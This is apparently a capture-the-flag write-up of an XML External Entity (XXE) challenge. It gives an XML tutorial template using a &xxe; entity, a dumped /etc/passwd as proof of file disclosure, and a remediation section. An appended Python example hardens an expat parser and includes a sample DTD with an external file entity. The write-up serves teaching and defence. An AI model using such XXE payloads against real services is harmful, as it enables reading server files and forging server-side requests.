
XXE


Description

Write-up: Guillaume
Creator: WOCSA
Difficulty: Unknown


Statement

An XML External Entity (XXE) attack is a type of attack against an application that parses XML input. It occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. The attack may lead to the disclosure of confidential data, denial of service, server-side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts.


Detailed solution

Exploitation

Create an XML template and add it to http://wg2d3m2w.3xploit.me/my_tutorials/

You can write something like:

<tutorial>
    <title>&xxe;</title>
    <creation_date>2024-05-04</creation_date>
    <published>True</published>
    <author>User123</author>
    <text_contents>
        <text_content>
            <bodyline>This is the content of the tutorial.</bodyline>
            <creation_date>2024-05-04</creation_date>
        </text_content>
        <text_content>
            <bodyline>More content...</bodyline>
            <creation_date>2024-05-05</creation_date>
        </text_content>
    </text_contents>
    <picture_contents>
        <picture_content>
            <picture>example.jpg</picture>
            <creation_date>2024-05-04</creation_date>
        </picture_content>
        <picture_content>
            <picture>another_example.jpg</picture>
            <creation_date>2024-05-05</creation_date>
        </picture_content>
    </picture_contents>
</tutorial>

PoC

With this you can do many things like LFI, SSRF or even RCE in certain contexts:

/etc/passwd:

root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin

Risk

An attacker with an XXE can read files and make requests from the server, recovering any data they want.

Remediation

Do not let the XML parser resolve external entities: disable DTD processing, or at least external entity resolution, in the parser configuration.
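As an added example (not code from this write-up or from the challenge), here is how a Python service could parse the tutorial XML above with the standard library's expat parser so that any DOCTYPE declaration or external entity reference is refused instead of expanded into the title. The element names are the page's; the sample documents and the placeholder entity path are constructed.

```python
import xml.parsers.expat as expat

class UnsafeXMLError(ValueError):
    """Input carried a DTD or external entity, or was not well-formed XML."""

def parse_tutorial(xml_text: str) -> dict:
    """Parse a <tutorial> document; return its title and <bodyline> count."""
    parser = expat.ParserCreate()
    result = {"title": "", "bodylines": 0}
    path, text = [], []  # element stack and character data of the current leaf
    def refuse_doctype(name, sysid, pubid, has_internal_subset):
        # Fires on "<!DOCTYPE" before any <!ENTITY ...> inside it is read.
        raise UnsafeXMLError(f"DOCTYPE refused: {name!r}")
    def refuse_external(context, base, system_id, public_id):
        # Defence in depth: never fetch a file:// or http:// entity target.
        raise UnsafeXMLError(f"external entity refused: {system_id!r}")
    def start(name, attrs):
        path.append(name)
        text.clear()
    def end(name):
        if path == ["tutorial", "title"]:
            result["title"] = "".join(text).strip()
        elif name == "bodyline":
            result["bodylines"] += 1
        path.pop()
    parser.StartDoctypeDeclHandler = refuse_doctype
    parser.ExternalEntityRefHandler = refuse_external
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = text.append
    try:
        parser.Parse(xml_text, True)
    except expat.ExpatError as exc:  # a bare &xxe; with no DTD lands here
        raise UnsafeXMLError(f"not well-formed: {exc}") from None
    return result

def is_refused(xml_text: str) -> bool:
    """True when the hardened parser rejects the document."""
    try:
        parse_tutorial(xml_text)
    except UnsafeXMLError:
        return True
    return False

# Constructed samples: a harmless tutorial, the write-up's template shape with
# a bare &xxe;, and the same with the entity declared in a DTD (placeholder path).
SAFE_DOC = ("<tutorial><title>Hi</title><text_contents><text_content><bodyline>a"
            "</bodyline><bodyline>b</bodyline></text_content></text_contents></tutorial>")
BARE_ENTITY_DOC = "<tutorial><title>&xxe;</title></tutorial>"
DTD_DOC = '<!DOCTYPE tutorial [<!ENTITY xxe SYSTEM "file:///placeholder">]>' + BARE_ENTITY_DOC
```

The DOCTYPE handler fires before the parser reads the entity declaration, so the entity target is never opened; the well-formedness error for an undeclared `&xxe;` is mapped onto the same exception so callers have one failure path.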